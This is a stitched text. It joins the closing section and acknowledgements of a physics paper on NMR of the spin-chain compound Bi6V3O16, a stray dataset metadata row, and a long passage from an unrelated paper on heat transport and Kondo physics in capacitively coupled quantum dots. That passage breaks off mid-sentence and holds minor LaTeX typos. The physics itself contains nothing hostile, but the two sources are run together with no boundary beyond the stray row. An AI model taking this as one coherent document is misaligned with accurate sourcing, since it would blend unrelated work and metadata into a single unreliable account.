sharing between the V$^{4+}$ and V$^{5+}$ ions in this compound.
The spin susceptibility calculated from the MAS-NMR experiments agrees well
with the uniform $S=\frac{1}{2}$ chain model with the dominant exchange coupling
of $J = 113(5)$~K, while the temperature variation of Knight shift
agrees well with
the findings from $\chi$ vs $T$ measurements.
Our experimental results from cryoMAS-NMR measurements concur
with the $S=\frac{1}{2}$ uniform chain model up to the available temperature range.
No sign of magnetic ordering
or any feature of spin gap has been observed in the temperature dependence
of $1/T_{1}$.
Bi$_{6}$V$_{3}$O$_{16}$ is one of the very few V-based systems in the category
of uniform spin chains where no long-range magnetic ordering or any singlet
formation were observed above $2$~K, while $J$ is of the order of $100$~K.
An ideal $S=\frac{1}{2}$ spin chain cannot exist in any real material because even an infinitesimal
interchain coupling would give rise to long-range magnetic order at suppressed, but
finite, temperatures.
Future work involving
local probe experiments, e.g, static NMR experiments down to millikelvin
temperatures, neutron diffraction, muon spin resonance, etc.,
is needed to acquire further knowledge about the possible ordering temperature and
the nature of the ordered magnetic structure
of Bi$_{6}$V$_{3}$O$_{16}$, for which a high-quality single crystal is needed.
\section{acknowledgement}
We thank M. B. Ghag and P. N. Mundye for the help and support during the sample
preparation at TIFR, A. A. Tsirlin and K. Kundu for insightful discussions, K. T\~{o}nsuaadu for
help with TG/DTA experiments and analysis,
and T. Tuherm for his help during our cryoMAS measurements
at NICPB. We acknowledge the Department of Science and Technology,
government of India; European Regional Development Fund (TK134); Estonian research council (PRG4, IUT23-7, MOBJD295, MOBJD449) for financial support.
| 2024-02-18T23:40:04.320Z | 2019-09-19T02:19:00.000Z | algebraic_stack_train_0000 | 1,246 | 7,459 |
|
proofpile-arXiv_065-6163 | \section{Introduction}
In the last years, there has been a significant interest in the thermal transport in the quantum coherent regime of electron systems.
A prominent example is the experimental measurement of the quantum of thermal conductance in the quantum Hall regime. \cite{jezouin}
In the most common scenario the thermal transport comes along with charge transport, which is at the heart of the basic Wiedemann-Franz law. The interplay between electrical and thermal transport is also the key of thermoelectricity, which is a very active avenue of research.
\cite{beni,engine,miao,svila,sierra,craven,dutta,cui,kra,pola,costi,leij,linke,anderg,aze,corna,guo,tooski,ng,aze2,kim,asha,rincon,dorda,diego,ecke,erdman,klo,sierra1,dare1,jiang,cui2,bala,rouarr,li,erdman2,karki,ridley,dare2}
Heat without charge transport is also related to interesting effects, including energy harvesting with quantum dots \cite{rafa1,rafa2,jaliel} and rectification.\cite{ruoko,yada} The relevant mechanism is the capacitive coupling of charge due to the Coulomb interaction. Interestingly, the quantum of thermal conductance per ballistic channel is
\begin{equation}
\kappa_{0}= \pi^2k_B^2 T/(3h), \label{quantum}
\end{equation}
and is independent of the statistics of the particles \cite{pendry}.
In general, Eq. (\ref{quantum}) is an upper bound for the conductance.
Capacitive couplings in electron systems are expected to achieve
significantly lower values than this bound, since it is very unlikely to realize a perfect ballistic regime in this scenario. \cite{hugo} A paradigmatic device to analyze the behavior of the thermal transport mediated by the Coulomb interaction consists of two capacitively coupled quantum dots (QDs) in contact to reservoirs $L$ and $R$ at
different temperatures $T_L$ and $T_R$, as sketched in Fig. \ref{esquema}. The simplest situation corresponds to single-level QDs of spinless electrons, which could be realized in the presence of a magnetic field. The Coulomb interaction is denoted
by $U$. Electrons do not tunnel between the two QDs. Hence, the thermal current is not accompanied by any charge current. A physical picture for the thermal transport in this device is given in Section \ref{pict}. See also Ref. \onlinecite{ruoko}.
The model is equivalent to that of transport between two levels with destructive interference
under high magnetic fields.\cite{desint,note}
It is also equivalent to a spinfull model for one dot in which electrons with spin up can only
hop to the left lead and electrons with spin down can only hop to the right lead or vice versa. Such a configuration ca be realized for totally polarized ferromagnetic leads with opposite orientation
(angle $\pi$ between them).\cite{pola}
The system was previously studied by recourse to rate equations, in the regime where the coupling between the QDs and the reservoirs is negligible, compared to $U$ as well as $k_B T_L$ and $k_B T_R$ \cite{rafa1,rafa2,ruoko}. More recently,
results were also presented for arbitrary coupling to the reservoirs and small $U$ and/or high $T$. \cite{yada} There is another interesting regime in this system, which consists in an orbital Kondo regime, taking place
below the characteristic temperature $T_K $.
\begin{figure}[tbp]
\includegraphics[clip,width=\columnwidth]{fig1.eps}
\caption{(Color online) Sketch of the system analyzed in this work in which two capacitively quantum dots are attached
to two conducting leads of spinless electrons and at different temperatures and chemical potentials.
It also describes two additional models as explained in the main text.}
\label{esquema}
\end{figure}
The Kondo effect is one of the most paradigmatic phenomenon in strongly
correlated condensed matter systems.\cite{hewson-book}
Its simplest version is realized in a single spinfull QD, which behaves as a quantum impurity when it is occupied by a single electron. It is characterized by the emergence of
a many-body singlet below $T_K$, which is formed by the spin 1/2 localized at the impurity and the spin
1/2 of the conduction electrons near the Fermi level.
As a consequence the spectral density
of the impurity displays a resonance at the Fermi energy. This explains the widely observed
zero-bias anomaly in charge transport through quantum dots with an odd number of
electrons.\cite{svila,sierra,dutta,costi,gold,cro,wiel,liang} The Kondo effect with spin $S>1/2$ has also been observed.\cite{roch,parks,serge}
The role of the impurity spin can be replaced by other quantum degree of
freedom that distinguishes degenerate states, such as orbital momentum.
Orbital degeneracy leads to the orbital Kondo effect or to more exotic Kondo effects, like the SU(4) one, when both orbital and spin degeneracy coexist. Some examples are present in nanoscopic systems.\cite{aze,corna,jari,ander,buss,tetta,grove,mina,lobos,3ch}
Evidence of the orbital Kondo effect has also been observed in magnetic systems in which the spin degeneracy is broken.\cite{kole,adhi,kov}
In the case of the double-dot model of Fig. \ref{esquema} the occupancy of
one dot or the other plays the role of the spin,
and a many-body state develops below $T_K$.
The study of the thermal transport in this regime has not been
addressed so far and one of the aims of the present work is to cover this gap. Concretely, we will focus on the regime of high temperature and analyze the effect of finite coupling between QDs and the reservoirs,
as well as the low temperature regime below $T_K$. In this regime, it is not possible to calculate the heat current exactly. For this reason, we rely on different approximations for systems out of equilibrium within the present state of the art techniques, which are described in Section \ref{scoup}.
Most of the results presented for finite coupling to the reservoirs
were obtained using non-equilibrium perturbation theory up to second order in $U$,
which is valid for small or moderate values of $U$.\cite{hersh,none}
For infinite $U$ we use renormalized perturbation theory,\cite{ng,hbo,cb,ct,ogu2}
and the non-crossing approximation.\cite{win,roura_1,tosib}
We carefully analyze in each case their range of validity and critically evaluate the accuracy of the predictions.
Another very interesting mechanism is thermal rectification. This is the key for the realization of thermal diodes and may be relevant for applications. Thermal rectification has been
recently studied in electron \cite{craven, ruoko} and spin \cite{ala,vinitha1,vinitha2} systems.
When the on-site energy of the QDs are different the device has important rectification properties.
Exploring different parameters, we find that inverting the temperature gradient the magnitude of
the thermal current is reduced by more than an order of magnitude.
The paper is organized as follows. We present the basis of the theoretical description in Section \ref{model}. In different subsections we explain the model and its symmetry properties, a physical picture for the thermal transport and the equations for the current. The different methods used to calculate the heat current and thermal conductance are described in Section \ref{methods}. The results for a symmetric system ($\mu_L=\mu_R=$, $E_L=E_R$, and $\Gamma_L=\Gamma_R$)
are presented in Section \ref{res}. In Section \ref{recti} we
calculate the rectification properties on the thermal current of an asymmetric system.
Section \ref{sum} is devoted to the summary and conclusions.
\section{Theoretical description}
\subsection{Model}
\label{model}
The Hamiltonian for the system sketched in Fig. \ref{esquema} reads
\begin{eqnarray}
H &=&\sum_{\nu }E_{\nu }d_{\nu }^{\dagger }d_{\nu }+Ud_{L}^{\dagger
}d_{L}d_{R}^{\dagger }d_{R}+\sum_{k\nu }\varepsilon _{k\nu }\,c_{k\nu
}^{\dagger }c_{k\nu } \notag \\
&&+\sum_{k\nu \sigma }\left( V_{k\nu }\,c_{k\nu }^{\dagger }d_{\nu }+\text{%
H.c.}\right) , \label{ham}
\end{eqnarray}%
where $\nu =L,R$ refers to the left and right dot or leads. The first term
describes the energy of an electron in each dot, the second term is the
Coulomb repulsion between electrons in different dots, the third term
corresponds to a continuum of extended states for each lead,
and the last term is the hybridization
between electrons of each dot and the corresponding lead.
In general, both leads are at different chemical potentials $\mu _{\nu }$
and temperatures $T_{\nu }$. For most of the results presented here we
take $\mu _{\nu }=0$.
The couplings to the leads, assumed energy-independent, are expressed
in terms of the half width at half maximum of the spectral density in the
absence of the interaction
\begin{equation}
\Gamma _{\nu }=\pi \sum_{k}|V_{k\nu }|^{2}\delta (\omega -\varepsilon _{k\nu
}). \label{del}
\end{equation}
Notice that this model is equivalent to a spinfull model, by identifying $L \rightarrow \uparrow$ and $R \rightarrow \downarrow$ (or vice versa) and considering
fully polarized ferromagnetic leads with opposite orientation of the magnetization. \cite{pola} In such case,
electrons with a given spin orientation can only tunnel to the lead polarized in the same direction and not to the other, as in the case of the Hamiltonian of Eq. (\ref{ham}).
On the other hand,
this model is also equivalent to the two-level model with destructive interference
studied in Ref. \onlinecite{desint} under high magnetic field. In this case, the labels $L,R$ correspond to two different degenerate levels of the same dot and the continua that
hybridizes with each of them.
\subsection{Transformations of the Hamiltonian}
\label{trans}
For later use, we describe here some transformations that map the Hamiltonian into itself with different parameters. Unless the parameters are left invariant by the transformations, they are not symmetries of the Hamiltonian.
We assume that the details of the conduction bands are not important, and the corresponding spectral densities can be assumed constant.
Then, the electron-hole transformation
\begin{eqnarray}
d_\nu^\dagger \rightarrow d_\nu,
c_{k\nu}^\dagger \rightarrow -c_{k^\prime \nu} \notag \\
\text{with }
\varepsilon _{k^\prime \nu}=-\varepsilon _{k\nu }.
\label{eh}
\end{eqnarray}
except for an unimportant additive constant, leads to an Anderson model with the following transformed parameters
\begin{eqnarray}
E_\nu^\prime = - E_\nu - U, \notag \\
\mu_\nu^\prime = - \mu_\nu,
\label{ehp}
\end{eqnarray}
while $U$ and $\Gamma_{\nu}$ are unchanged.
Clearly this is a symmetry of the Hamiltonian in the so called {\em symmetric case} $\mu_\nu=0$, $E_\nu=-U/2$.
Similarly one could perform this transformation for only the left or right part of the Hamiltonian.
In the latter case, the transformation is
\begin{eqnarray}
d_R^\dagger \rightarrow d_R,
c_{k R}^\dagger \rightarrow -c_{k^\prime R}.
\label{shiba}
\end{eqnarray}
In this case, the transformed parameters become
\begin{eqnarray}
U^\prime =-U, \notag \\
E_L^\prime = E_L + U, \notag \\
E_R^\prime = - E_R, \notag \\
\mu_R^\prime = - \mu_R
\label{shibap}
\end{eqnarray}
while the rest of the parameters remain unchanged.
In the symmetric case, this transformation maps the problem for Coulomb repulsion $U$ to a model with and attractive interaction $-U$.
\subsection{Mechanism for thermal transport}
\label{pict}
Since electrons cannot hop between left and right QDs, it is clear that the particle current is zero.
It might seem surprising that the heat current is nonzero
under a finite temperature difference $\Delta T= T_L-T_R$, in spite of the fact that the exchange of particles is not possible.
The aim of this section is to provide an intuitive picture for the transport of heat in the presence
of interactions. We assume small $\Gamma_\nu$ so that states with well-defined number of particles
at each dot are relatively stable. Without loss of generality we can also assume $\Delta T>0$.
Let us take $E_L=E_R < \mu_L=\mu_R=0$ and $E_\nu +U >0$.
For $\Gamma_\nu \rightarrow 0$ one of the possible ground states of
the system has occupancies $(n_L,n_R)=(0,1)$. Let us take this state as the initial state for a cycle of transitions
that transport heat. For non-zero $\Gamma_L$, if $T_L$ is high enough there is a finite probability for an electron from the left lead
to tunnel into the left QD and perform
the thermal cycle shown in Fig. \ref{esquema2}. The steps of the cycle are the following.
i) An electron from the left lead occupy the left dot changing the state of the double
dot to (1,1) [(0,1) $\rightarrow$ (1,1)]. This costs energy $U+E_L$ which is taken from the left lead.
Next (ii) an electron from the right dot hops to the right lead [(1,1) $\rightarrow$ (1,0)].
This relaxes the energy $U+E_R$ which is then transferred to the right lead. Next (iii) the electron from the left
dot jumps to the corresponding lead [(1,0) $\rightarrow$ (0,0)]. This requires an energy $|E_L|$ taken form the left lead.
Finally, (iv) an electron from the right lead occupy the right dot closing the cycle [(0,0) $\rightarrow$ (0,1)]
and transferring the energy $|E_R|$ to the right lead. As a result of the cycle an amount of energy
$U$ is transferred from the left to the right lead.
\begin{figure}[tbp]
\includegraphics[clip,width=7cm]{fig2_b.eps}
\caption{(Color online) Schematic picture for the transport of heat in the presence of interactions. Although Eq. (\ref{ham}) is defined for spinless electrons, the sketch considers also
spin, in order to also represent the corresponding configurations of the single-dot spinfull model with polarized reservoirs discussed at the end of Section \ref{model}.
}
\label{esquema2}
\end{figure}
The processes involved in each step of this cycle compete against the reverse ones.
The resulting thermal current sketched in Fig. \ref{esquema2} actually
depends on the probability per unit time of these process
and its proper evaluation requires an explicit calculation.
In addition, while this picture provides a qualitative understanding
for the general case, it is not enough to describe the thermal transport in the Kondo regime in which cotunneling events are important and does not explain what happens in the $U \rightarrow \infty$ limit.
Fig. \ref{esquema2} is also useful to represent the fluctuations involved in the Kondo effect. For the spinfull QD coupled to polarized reservoirs mentioned at the end of Section \ref{model}
and for the model of Ref. \onlinecite{desint} these processes correspond to spin and orbital fluctuations, respectively.
The sequence of the two steps (i) and (ii) and its time-reversed sequence
correspond to fluctuations through the virtual state with double occupancy. Note that a temperature difference $\Delta T>0$ favors the sequence (i)-(ii) with respect to the reciprocal one. Similarly, the process (iii)-(iv) and the reciprocal one correspond to fluctuations through the virtual empty double dot and the former is favored by the temperature difference $\Delta T>0$.
We must warn the reader that the above simple picture uses eigenstates of the limit
$\Gamma_\nu \rightarrow 0$ and does not explain the existence of a finite heat current
for finite $E_\nu$ in the limit $U \rightarrow 0$ as discussed in Section \ref{uinf}.
\subsection{Equations for the currents}
\label{curr}
We consider $T_R=T$ and $T_L=T+\Delta T$. The heat currents $J_{Q}^{L}$ flowing from the left lead to the dot and
$J_{Q}^{R}$ flowing from the dot to the right lead are
\begin{equation}
J_{Q}^{\nu }=J_{E}^{\nu }-\mu _{\nu }J_{N}^{\nu }, \label{jq}
\end{equation}%
where $J_{E}^{\nu }$ are the energy currents.
In the stationary state, the charge and energy currents are uniform and should be conserved:
$J_N^L=J_N^R$ and $J_E^L=J_E^R$. The heat current is not conserved under an applied voltage
($\mu_L \neq \mu_R$) due to Joule heating of the interacting part of the system.\cite{ng}
For the setups studied in this work $J_N^L=J_N^R=0$ because electrons cannot hop between the two QDs. Hence, $J_N^{\nu}=0$ and the heat currents coincide with the energy currents.
In terms of non-equilibrium Green's functions the latter are given by
\begin{equation}
J_{E}^{\nu }=\pm \frac{2i\Gamma_{\nu }}{h}\int \omega d\omega \left[
2if_{v}(\omega )\text{Im}G_{\nu }^{r}(\omega )+G_{\nu }^{<}(\omega )\right] ,
\label{jelr}
\end{equation}
where upper (lower) sign corresponds to $\nu =L$ ($R$). The retarded $G_{\nu }^{r}(\omega )$ and lesser $G_{\nu }^{<}(\omega )$ Green's functions are, respectively, the Fourier transforms of
$G_{\nu }^{r}(t-t^{\prime} ) = -i \Theta(t-t^{\prime}) \langle \{c_{\nu}(t), c^{\dagger}_{\nu}(t^{\prime}) \}\rangle$
and $G_{\nu }^{<}(t-t^{\prime} ) = i \langle c^{\dagger}_{\nu}(t^{\prime}) c_{\nu}(t) \rangle$, while $f_{\nu }(\omega )=\left\{ 1+\exp
[(\omega -\mu _{\nu })/T_{\nu }]\right\} ^{-1}$ is the Fermi function.
In the next sections (particularly when the approach used conserves the heat current only approximately) we adopt the following definition for
the heat current $J_Q=\sum_{\nu} J_E^{\nu}/2$.
For a small temperature difference, such that $\Delta T/T \ll 1$, the above equation can be expanded in powers of this quantity. The thermal conductance, is the coefficient associated to the linear order in this expansion. It is defined as
\begin{equation}\label{kappa}
\left. \kappa(T)=\frac{d J_Q}{d \Delta T}\right|_{\Delta T=0}.
\end{equation}
For completeness, we present below the expressions for the particle current flowing
between the leads and the QDs in terms of Green's functions,
\begin{equation}
J_{N}^{\nu}=\pm \frac{2i\Gamma _{\nu}}{h}\int d\omega \left[ 2if_{\nu}(\omega )
\text{Im}G_{\nu}^{r}(\omega )+G_{\nu}^{<}(\omega )\right] . \label{jnu}
\end{equation}
In the next section, we will use the fact that $J_N^{\nu}=0$, in order to infer properties of the Green's functions in the limit $\Gamma_{\nu}\rightarrow 0$.
\section{Methods}
\label{methods}
We now briefly describe the methods to be used to calculate the heat current in the different regimes of parameters.
\subsection{Weak coupling to the reservoirs}
\label{ato}
This limit corresponds to $\Gamma_{\nu} \rightarrow 0$. This regime is usually addressed with rate equations.\cite{rafa1,rafa2,ruoko,yada}
Here, we present an alternative derivation on the basis of Green's functions and conservation laws.
Evaluation of Eq. (\ref{jelr}) at the lowest order in $\Gamma_{\nu}$ implies calculating $G_{\nu}^{r,<}(\omega )$ for the QDs uncoupled from the reservoirs. This is usually referred to as the {\em atomic limit}, and
the Green's functions can be calculated, for instance, from equations of motion. \cite{none} The result is
\begin{eqnarray}
G_{\nu }^{r}(\omega ) &=&\frac{1-n_{\bar{\nu}}}{\omega -E_{\nu }}+\frac{n_{%
\bar{\nu}}}{\omega -E_{\nu }-U}, \notag \\
G_{\nu }^{<}(\omega ) &=&2\pi i\left[ a_{\nu }\delta (\omega -E_{\nu
})+b_{\nu }\delta (\omega -E_{\nu }-U)\right] , \label{gf}
\end{eqnarray}%
where $n_{\nu }=\langle d_{\nu }^{\dagger }d_{\nu }\rangle $ is the
expectation value of the occupancy of the dot $\nu $ and $\bar{\nu}=R$ ($L$)
if $\nu =L$ ($R$). The functions $a_{\nu }$ and $b_{\nu }$ are not simply determined by the energy population of the reservoirs
for $\Gamma _{\nu }=0$. Within the equation of motion technique it is necessary
to include finite $\Gamma _{\nu }$ and approximations in order to evaluate them. Another possibility is to evaluate them from rate equations. \cite{rafa1,rafa2,ruoko} Here we proceed as follows. We start by
expressing the occupation of the QD in terms of Green's functions
\begin{equation}
n_{\nu }=\frac{-i}{2\pi }\int d\omega G_{\nu }^{<}(\omega )=a_{\nu }+b_{\nu
}. \label{nnu}
\end{equation}
The latter equation defines a relation between the occupation and the unknowns $a_{\nu }$ and $b_{\nu}$.
Replacing Eqs. (\ref{gf}) and (\ref{nnu}) in Eqs. (\ref{jnu})
and imposing $J_{N}^{L}=J_{N}^{R}=0$ we get the following set of two
equations
\begin{equation}
n_{\nu }=(1-n_{\bar{\nu}})f_{\nu }(E_{\nu })+n_{\bar{\nu}}f_{\nu }(E_{\nu
}+U), \label{seq}
\end{equation}%
from which $n_{\nu }$ can be determined. The result is
\begin{eqnarray}
n_{\nu } &=&\frac{f_{\nu }(E_{\nu })-f_{\bar{\nu}}(E_{\bar{\nu}})D_{\nu }}{%
1-D_{L}D_{R}}, \notag \\
D_{\nu } &=&f_{\nu }(E_{\nu })-f_{\nu }(E_{\nu }+U). \label{nnuf}
\end{eqnarray}
Using Eqs. (\ref{seq}) the energy currents can be written as
\begin{equation}
J_{E}^{\nu }=\pm \frac{4\pi \Gamma _{\nu }U}{h}\left[ n_{\bar{\nu}}f_{\nu
}(E_{\nu }+U)-b_{\nu }\right] . \label{je2}
\end{equation}%
Conservation of the energy current in the stationary state $%
J_{E}^{L}=J_{E}^{R}$ leads to an equation for $\Gamma _{L}b_{L}+\Gamma_{R}b_{R}$. At this point we introduce the assumption $b_{L}=b_{R}$. This is
justified from the functional dependence of $G_{\nu }^{<}(\omega )$ on these parameters [see Eqs. (\ref{gf})] and Eq.(\ref{nnu}). In fact, notice that
$b_{\nu}$ is the contribution to $n_{\nu}$ at the
energy $E_{\nu}+U$, which implies that the two dots are occupied. Hence,
$b_{\nu }=\langle d_{L}^{\dagger }d_{L}d_{R}^{\dagger }d_{R}\rangle $ for $\nu=L,R$.
Therefore, using $J_{E}^{L}=J_{E}^{R}$ and $b_{L}=b_{R}$ we obtain
\begin{eqnarray}
(\Gamma _{L}+\Gamma _{R})b_{\nu } &=&\Gamma_{L}n_{R}f_{L}(E_{L}+U) \notag\\
&&
+\Gamma _{R}n_{L}f_{R}(E_{R}+U). \label{bnu}
\end{eqnarray}%
Using Eqs. (\ref{nnuf}) and some algebra we can verify that Eq. (\ref{bnu}) leads to the correct result at equilibrium. In fact,
for $\mu _{L}=\mu_{R}=0$, $T_{L}=T_{R}=1/\beta $ we recover
\begin{eqnarray}
b_{\nu } &=&\langle d_{L}^{\dagger }d_{L}d_{R}^{\dagger }d_{R}\rangle
=n_{R}f_{L}(E_{L}+U)=n_{L}f_{R}(E_{R}+U) \notag \\
&=&\frac{e^{-\beta (E_{L}+E_{R}+U)}}{1+e^{-\beta E_{L}}+e^{-\beta
E_{R}}+e^{-\beta (E_{L}+E_{R}+U)}}. \label{beq}
\end{eqnarray}
Replacing Eq. (\ref{bnu}) in Eq. (\ref{je2}) we obtain the final
expression for the heat current,
\begin{eqnarray}
J_{Q} &=&\Gamma_Q U [n_{R}f_{L}(E_{L}+U)
-n_{L}f_{R}(E_{R}+U)], \label{jqf}
\end{eqnarray}
with $\Gamma_Q= 4\pi \Gamma _{L}\Gamma _{R}/h(\Gamma_{L}+
\Gamma_{R})$.
After some algebra, it can be checked that this expression is invariant under the transformations defined by
Eqs. (\ref{ehp}) and (\ref{shibap}), as expected.
For the symmetric case $\mu_\nu=0$, $E_{\nu }=-U/2$, we have $n_{\nu }=1/2$ and Eq. (\ref{jqf})
reduces to
\begin{eqnarray}
J_{Q} &=& \frac{\Gamma_Q}{2}U [f_{L}(U/2)-f_{R}(U/2)]. \label{jqyada}
\end{eqnarray}
which coincides with the expression obtained by Yadalam and Harbola [see the
expression of $C_{1}$ in appendix A of Ref. \onlinecite{yada}, note that
in their notation $\Gamma_\nu$ is two times our definition given by Eq. (\ref{del})].
Interestingly, in this case, the symmetry Eq. (\ref{shiba}) implies that $J_Q$ is an even function
of $U$.
\subsection{Moderate or strong coupling to the reservoirs}
\label{scoup}
We briefly introduce the methods we use to solve the problem for finite $\Gamma_\nu$,
discussing the range of validity, as well as
the advantages and disadvantages. These are perturbation theory (PT), renormalized perturbation theory (RPT) and non-crossing approximation (NCA). All these methods are suitable to address the Kondo regime.
\subsubsection{Perturbation theory in $U/\Gamma$ (PT)}
\label{pert}
For the Anderson model at equilibrium, with $\Gamma_L=\Gamma_R=\Gamma$, PT
in the Coulomb repulsion $U$
has been a popular method used for several years now,\cite{yam,hor}
also applied to nanoscopic systems at equilibrium as well as away from equilibrium,\cite{levy,ogu,mir,pro,lady,hersh,none} and recently to superconducting
systems.\cite{zonda,zonda2} It consists in calculating the Green's function with a self-energy evaluated up to second order in the interaction $U$.
As expected for a perturbative approach, it is in principle valid for $U/(\pi \Gamma) <1$. However
comparison with Quantum Monte Carlo results indicate that the method in equilibrium configurations
is quantitatively valid in the symmetric case $E_L=E_R=-U/2$, for $U/(\pi \Gamma )$ as large as
2.42.\cite{sil}
Here we summarize the main expressions following the notation of Ref. \onlinecite{none}. The retarded and lesser Green's functions read
\begin{eqnarray}\label{2o}
\left[G^r_{\nu}(\omega)\right]^{-1}&=& \left[g^r_{\nu}(\omega)\right]^{\-1} -\Sigma_\nu^{r2}(\omega),\nonumber \\
G^<_{\nu}(\omega) &=& |G^r_{\nu}(\omega)|^2 \left(\frac{g^<_{\nu}(\omega)}{|g^r_{\nu}(\omega)|^2} - \Sigma_\nu^{<2}(\omega)\right).
\end{eqnarray}
The latter depend on the non-interacting Green's functions for the QDs coupled to the reservoirs,
\begin{eqnarray}
\left[g^r_{\nu}(\omega)\right]^{-1} &=& \omega - \epsilon_{\nu} +i \Gamma_{\nu}, \nonumber \\
g^<_{\nu}(\omega) &=&2 i |g^r_{\nu}(\omega)|^2 \Gamma_{\nu} f_{\nu}(\omega),
\end{eqnarray}
where $\epsilon_{\nu}$ are effective energies that contain the first-order corrections in $U$.
They vanish in the symmetric case $\mu_{\nu}=0$, $E_\nu=-U/2$.
The second-order contributions to the self-energies are
\begin{eqnarray}
\Sigma _{\nu}^{r2}(\omega ) &=&U^{2}\int \frac{d\omega _{1}}{2\pi }
\int \frac{d\omega _{2}}{2\pi } \nonumber \\
&&[g_{\nu}^{r}(\omega _{1})g_{\bar{\nu}}^{r}(\omega
_{2})g_{\bar{\nu}}^{<}(\omega _{1}+\omega _{2}-\omega ) \nonumber \\
&&+g_{\nu}^{r}(\omega _{1})g_{\bar{\nu}}^{<}(\omega
_{2})g_{\bar{\nu}}^{<}(\omega _{1}+\omega _{2}-\omega ) \nonumber \\
&&+g_{\nu}^{<}(\omega _{1})g_{\bar{\nu}}^{r}(\omega
_{2})g_{\bar{\nu}}^{<}(\omega _{1}+\omega _{2}-\omega ) \nonumber \\
&&+g_{\nu}^{<}(\omega _{1})g_{\bar{\nu}}^{<}(\omega
_{2})g_{\bar{\nu}}^{a}(\omega _{1}+\omega _{2}-\omega )], \label{sr2}
\end{eqnarray}
\begin{eqnarray}
\Sigma _{\nu}^{<2}(\omega ) &=&-U^{2}\int \frac{d\omega _{1}}{2\pi }
\int \frac{d\omega _{2}}{2\pi } \nonumber \\
&&g_{\nu}^{<}(\omega _{1})g_{\bar{\nu}}^{<}(\omega
_{2})g_{\bar{\nu}}^{>}(\omega _{1}+\omega _{2}-\omega ), \label{sl2}
\end{eqnarray}
where $g_{\nu}^{a}=\bar{g_{\nu}^{r}}$ is the advanced non-interacting Green's function.
Some integrals can be calculated analytically as described in Ref. \onlinecite{none}.
One shortcoming of the approach is that it does not guarantee the conservation of the particle and energy currents.
This means that in general the approximation gives $J_N^L \ne J_N^R$ and $J_E^L \ne J_E^R$
[see Eqs. (\ref{jelr}) and (\ref{jnu})], contrary to what one expects.
In our case however $J_N^L=J_N^R=0$ within numerical precision, so that the particle current is conserved. Concerning the energy current,
the relative deviation
\begin{equation}\label{d}
d=|J_Q^L/J_Q-1|=|J_Q^R/J_Q-1|,
\end{equation}
is usually of the order of 2\% or less,
but reaches a value near 14\% at high temperatures and the largest values of $U$ considered
with this method in Section IV ($U=7 \Gamma$). In the calculations, we will define the range of validity of the method as that corresponding to a small value of this deviation.
\subsubsection{Renormalized perturbation theory (RPT)}
\label{rpt}
For $U \gg \Gamma$ the approach mentioned above fails. However, for energy scales below
$T_K$ one can use renormalized perturbation theory (RPT).
For energy scales of the order of $T_K$ or larger,
the method loses accuracy and a complementary approach is needed.
The basic idea of RPT is to calculate the Green's functions of
Eq. (\ref{2o}) with the second-order self-energy calculated with renormalized
parameters
$\widetilde{U}/(\pi \widetilde{\Gamma })$. The latter correspond to
fully dressed quasiparticles, taking as a basis the equilibrium Fermi liquid picture.\cite{he1}
The renormalized parameters can be
calculated exactly using Bethe ansatz, or with high accuracy
using numerical renormalization group.\cite{cb,re1} The resulting values of $\widetilde{U}/(\pi \widetilde{\Gamma })$ are small, being usually below 1.1
even for $U \rightarrow \infty$.\cite{cb,ct}
Our RPT procedure consists in using renormalized parameters for $E_L=E_R$, $U$ and $\Gamma $
obtained at $\mu_L=\mu_R=T_L=T_R=0$ by a numerical-renormalization-group calculation,\cite{cb,ct}
and incorporating perturbations up to second order in the
renormalized $U$ ($\widetilde{U}$). It has been shown explicitly that this satisfies
important Ward identities even away from equilibrium.\cite{ng,ct}
At equilibrium, the method provides results that coincide
with state-of-the art techniques for the dependence of the electrical conductance with
magnetic field \cite{cb} and temperature \cite{ct}.
As in the case of PT, the conservation laws are not guaranteed and the relative deviation defined in Eq. (\ref{d}) is a control parameter to define the validity of the results
obtained with this method.
\subsubsection{Non-crossing approximation (NCA)}
\label{nca}
The NCA technique is one of the standard tools for calculating these Green functions
in the Kondo regime, where the total occupancy of the interacting subsystem
is near 1 and with small charge fluctuations
(the charge is well localized in the dot or dots). It corresponds to evaluating the self-energy for the non-equilibrium Green's functions entering Eqs. (\ref{jelr}) and (\ref{jnu})
via the summation of an infinite series of diagrams (all those in which the propagators do not cross) in perturbation theory in the couplings $\Gamma_\nu$.\cite{win,roura_1,tosib}
The formalism is explained in detail in Ref. \onlinecite{tosib} for a model which
contains the present one as a limiting case.
The main limitation of the approach is that if fails to reproduce Fermi-liquid properties at
equilibrium at temperatures well below the characteristic Kondo temperature.\cite{win}
NCA has being
successfully applied to the study of a variety of systems such as
C$_{60}$ molecules displaying a quantum phase transition,\cite{serge,roura_2},
a nanoscale Si transistor,\cite{tetta}
two-level quantum dots,\cite{tosi_1} and the interplay between vibronic effects and the Kondo effect.\cite{desint,sate}
Recently it has also been used to calculate heat transport.\cite{dare1,diego,dare2}
In spite of this success, the NCA has some
limitations at very low temperatures (below $\sim 0.1 T_{K}$). For example,
it does not satisfy accurately the Friedel sum rule at zero
temperature.\cite{fcm}
In this sense it is complementary to RPT, which should be accurate for $T_L, T_R \ll T_K$.
In contrast to the previous methods, NCA conserves the charge current, as shown explicitly in Ref. \onlinecite{tosib}.
We find that the NCA also conserves the energy current.
\subsection{Evaluation of the Kondo temperature}
\label{tk}
In order to compare the results of different approximations, it is convenient to represent the results
taking the unit of energy as the Kondo temperature $T_K$ which is the only relevant energy scale at small temperatures.
The evaluation of $T_K$ in the Anderson impurity model on the basis of PT, RPT and NCA has been addressed in several works in the literature. Because of some details of the different approximations (like the high-energy
cutoff for example), the $T_K$ differ, although they are of the same
order of magnitude.
Here,
we follow Ref. \onlinecite{asym}, which is based on the analysis of the electrical conductance
as a function of temperature $G(T)$ of a similar physical system. In the model under investigation, the electrical conductance vanishes, as already mentioned. However, it is possible to define an Anderson impurity model, equivalent to ours at equilibrium,
with non-vanishing $G(T)$,
which has the same $T_K$ as the model of Eq. (\ref{ham}). Recalling that the hybridization to the leads is given by $\Gamma_L=\Gamma_R=\Gamma$,
the equivalent spin-degenerate Anderson impurity model has
hybridization $\Gamma/2$ for each spin orientation and each lead (this is actually the simplest Anderson model that describes the conductance through a spin degenerate QD).
At equilibrium, the latter has the same spectral density and the same $T_K$ as our 2-dot model of Eq. (\ref{ham}). Hence, we can use the method of Ref. \onlinecite{asym} to calculate $T_K$.
In particular, we can extract $T_K$ from the temperature dependence of the electrical conductance $G(T)$. As explained in that reference, such a procedure is more reliable than alternative methods, like fitting the spectral density or the non-equilibrium electrical conductance $G(V_b)$
as a function of bias voltage $V_b=(\mu_L-\mu_R)/e$.
For example, different fitting procedures to fit the line shape of $G(V_b)$
